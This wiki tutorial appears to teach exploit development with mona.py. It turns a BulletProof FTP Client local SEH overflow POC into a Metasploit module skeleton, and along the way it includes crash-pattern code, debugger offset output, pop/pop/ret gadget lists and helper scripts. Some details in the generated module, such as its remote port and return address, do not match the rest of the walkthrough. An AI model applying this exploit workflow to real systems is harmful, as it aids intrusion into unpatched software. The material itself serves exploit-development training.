Difference between revisions of "Test"

From Security Weekly Wiki

Latest revision as of 16:36, 20 April 2017

About & Why

Mona can be used by pentesters and exploit developers to take a proof of concept crash and turn it into a working exploit in a quick and organized fashion, eliminating downtime.

How

Using the framework Corelanc0d3r has built, Mona drives the debugger and can evaluate stack, SEH, ROP and egg-hunter options for you, then writes the result out as a Metasploit module skeleton. Below I take a POC found on exploit-db through to a Metasploit module. This tool makes me very excited; even though it has been around for a while, I've only just found it, and as far as I can tell no one here has posted anything about it. So I'm going to walk through some basic exploit development with mona.py in Immunity Debugger, using the following exploit POC: http://www.exploit-db.com/exploits/18716/

First, we need to go to corelan (http://redmine.corelan.be/projects/mona) to download mona and follow the setup, which is honestly a drag-and-drop operation plus a few commands to make mona write its log files to the right place (without overwriting them).

Now, pretty much every class I've taken on exploit development has relied on Metasploit to generate patterns and find memory offsets in the stack, registers and EIP. Mona makes this process simple. Let's take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long:


!mona pc 552

Mona tells us:

Output generated by mona.py v2.0, rev 447 - Immunity Debugger

Corelan Team - https://www.corelan.be

OS : xp, release 5.1.2600

Process being debugged : _no_name (pid 0)

2013-10-17 16:25:27

Pattern of 552 bytes :

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3


We take that pattern, which is completely unique in structure (every 4-byte window of it occurs only once, so a register value maps back to a single offset), and inject it into our POC like so:



# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App

# Python 2 script, as published in the POC; the mona pattern replaces the original junk.
file="poc.reg"
junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"

# Build a .reg file that sets the client's LogFileName option to the pattern
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"
poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";



We execute our code; in this case the Python script creates the .reg file (poc.reg), and the POC header tells us why we need to import it into our registry. We then open our BulletProof FTP client.

(screenshot: EBP.png)


Look at that! Our pattern is shown in EAX and EBP. Great, so how does that help us?

I'm not sure. If I were looking at this normally I would be looking for EIP; however, there are many ways to get our own code to execute. Let's ask Mona!

We type in :

!mona findmsp

(alternatively we can find the offset of a single value with !mona po xyz)

(screenshot: Findmsp.png)

We get the following results:

[+] Looking for cyclic pattern in memory

Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)

Stack pivot between 172 & 724 bytes needed to land in this pattern

Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)

EAX overwritten with normal pattern : 0x41366e41 (offset 408)

EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512

0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68

0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68

0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68

0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552

0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552

0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116

0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552

0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116

0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108

0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116

0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292

0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552

Wow, it took Mona a couple of seconds to do that. It might have taken me a while to figure all that out.

In this particular instance, the following is interesting :

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data
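To see where those numbers come from, here is an added example (my own code, not mona.py's and not part of the original post) that re-implements the two things mona did for us above: the Aa0Aa1... cyclic pattern that !mona pc emits, and the offset lookup behind !mona findmsp / !mona po. The values fed in are the ones findmsp printed on this page: EAX held 0x41366e41, and the SEH record was overwritten with 0x7041396f. The function names and the assumption that the printed SEH dword is the handler field (with nSEH four bytes earlier) are mine.

```python
import string
import struct

PATTERN_LENGTH = 552  # the size used on this page (!mona pc 552)


def pattern_create(length):
    """Return the Aa0Aa1Aa2...Zz9 cyclic pattern cut to `length` bytes.

    Every 4-byte window of the full pattern is unique, which is what lets a
    register value be mapped back to exactly one offset.
    """
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=PATTERN_LENGTH):
    """Offset of a 32-bit value inside the pattern, or None if absent.

    The dword is packed little-endian because that is how the four pattern
    bytes sit in memory on x86 when a register or SEH field reads them.
    """
    needle = struct.pack("<I", value)
    idx = pattern_create(length).encode("ascii").find(needle)
    return None if idx < 0 else idx


def seh_offsets(handler_value, length=PATTERN_LENGTH):
    """Reconstruct the numbers findmsp reports for an overwritten SEH record.

    `handler_value` is the dword found in the handler field (assumption: that
    is the dword mona prints). The nSEH field sits 4 bytes before it, and the
    pattern bytes after nSEH are the room left in the buffer. Returns
    (nseh_offset, handler_offset, bytes_after_nseh), or None when the dword
    is not pattern data.
    """
    handler_off = pattern_offset(handler_value, length)
    if handler_off is None or handler_off < 4:
        return None
    nseh_off = handler_off - 4
    tail = length - nseh_off - 4
    return nseh_off, handler_off, tail


if __name__ == "__main__":
    # Values taken from the findmsp output on this page.
    print("EAX 0x41366e41 -> offset", pattern_offset(0x41366e41))  # 408
    print("SEH 0x7041396f ->", seh_offsets(0x7041396f))            # (444, 448, 104)
```

Running it reproduces the page: EAX's value lands at offset 408, the SEH dword 0x7041396f sits at 448, so nSEH is at 444 (the 'Offset' mona later puts in the module) and 104 bytes of pattern follow it (the "104 bytes of space" the generated module comments on). A value that is not pattern data, such as 0x41414141, returns None, which is the case to check before trusting an offset.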

Let's go look at that in the stack:


(screenshot: Stack.png)


Alright, so this is an SEH overwrite exploit. Let's ask mona what to do:

!mona SEH

Our list of Pop Pop Ret:

(screenshot: Poppopret.png)


0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

(this is a partial list)
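Each of those lines also records why the address was offered at all: the module's protection flags. As an added example (my own code, not mona's), here is a parser for the line format shown above that pulls those flags out, so you can see at a glance which mitigations the binary was built without. The three sample lines are copied from the list on this page; the regex is written against this mona build's layout (an assumption, since other versions may add fields).

```python
import re

# Line layout as printed by the mona build used on this page (assumption).
SEH_LINE = re.compile(
    r"^0x(?P<addr>[0-9a-fA-F]{8}) : (?P<gadget>.+?) \| (?P<props>\S+) "
    r"\{(?P<page>[A-Z_]+)\} \[(?P<module>[^\]]+)\] "
    r"ASLR: (?P<aslr>True|False), Rebase: (?P<rebase>True|False), "
    r"SafeSEH: (?P<safeseh>True|False), OS: (?P<os>True|False), "
    r"v(?P<version>\S+) \((?P<path>.*)\)$"
)

# Three lines copied from the !mona seh output above (not constructed).
SAMPLE_OUTPUT = r"""
0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
"""


def parse_seh_output(text):
    """Turn mona's pop/pop/ret lines into dicts; lines that don't match are skipped."""
    records = []
    for line in text.splitlines():
        m = SEH_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["addr"] = int(rec["addr"], 16)
        for flag in ("aslr", "rebase", "safeseh", "os"):
            rec[flag] = rec[flag] == "True"
        rec["props"] = rec["props"].split(",")
        records.append(rec)
    return records


def protection_gaps(record):
    """Mitigations the module is missing, in the order mona lists them."""
    gaps = []
    if not record["safeseh"]:
        gaps.append("SafeSEH")
    if not record["aslr"]:
        gaps.append("ASLR")
    return gaps


def modules_lacking_safeseh(records):
    """Modules whose handler table would not reject these addresses."""
    return sorted({r["module"] for r in records if not r["safeseh"]})


def has_null_byte(addr):
    """True when any byte of the 32-bit address is 0x00 (mona's 'startnull')."""
    return any(((addr >> shift) & 0xFF) == 0 for shift in (0, 8, 16, 24))


if __name__ == "__main__":
    for rec in parse_seh_output(SAMPLE_OUTPUT):
        print("0x%08x %-16s gaps=%s null=%s" % (
            rec["addr"], rec["module"], protection_gaps(rec), has_null_byte(rec["addr"])))
```

The output shows the reason bpftpclient.exe is the source of every candidate: it was linked without SafeSEH and without ASLR, so its own code is the only place mona can point the handler field at. Linking the executable with /SAFESEH and /DYNAMICBASE would make those flags read True and remove it from this list entirely. The 'startnull' property flags that every address here begins with a null byte, which is why that property appears on all of them.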

!mona suggest

This is rather interesting: Mona will give us a Metasploit module based on the information from findmsp.

(screenshot: Monasuggest.png)

Output:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
 #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Seh
 def initialize(info = {})
   super(update_info(info,
     'Name'    => 'insert name for the exploit',
     'Description'  => %q{
         Provide information about the vulnerability / explain as good as you can
         Make sure to keep each line less than 100 columns wide
     },
     'License'    => MSF_LICENSE,
     'Author'    =>
       [
         'insert_name_of_person_who_discovered_the_vulnerability<user[at]domain.com>',  # Original discovery
         '<insert your name here>',  # MSF Module
       ],
     'References'  =>
       [
         [ 'OSVDB', '<insert OSVDB number here>' ],
         [ 'CVE', 'insert CVE number here' ],
         [ 'URL', '<insert another link to the exploit/advisory here>' ]
       ],
     'DefaultOptions' =>
       {
         'ExitFunction' => 'process', #none/process/thread/seh
         #'InitialAutoRunScript' => 'migrate -f',
       },
     'Platform'  => 'win',
     'Payload'  =>
       {
         'BadChars' => "", # <change if needed>
         'DisableNops' => true,
       },
     'Targets'    =>
       [
         [ '<fill in the OS/app version here>',
           {
             'Ret'     =>  0x007ecfef, # pop ebx # pop ebp # ret  - bpftpclient.exe
             'Offset'  =>  444
           }
         ],
       ],
     'Privileged'  => false,
     #Correct Date Format: "M D Y"
     #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
     'DisclosureDate'  => 'MONTH DAY YEAR',
     'DefaultTarget'  => 0))
   register_options([Opt::RPORT(21)], self.class)
 end
 def exploit


   connect
   buffer = rand_text(target['Offset'])  #junk
   buffer << generate_seh_record(target.ret)
   buffer << payload.encoded  #104 bytes of space
   # more junk may be needed to trigger the exception
   print_status("Trying target #{target.name}...")
   sock.put(buffer)
   handler
   disconnect
 end

end

amazing stuff!!!

Stay tuned for some more exploit fun!!!


References

https://www.corelan.be/

https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/

http://redmine.corelan.be/projects/mona


(The tutorials and mona.py are all by Corelanc0d3r; I take no credit, I just think it's an awesome tool!)

Plugs

@rkornmeyer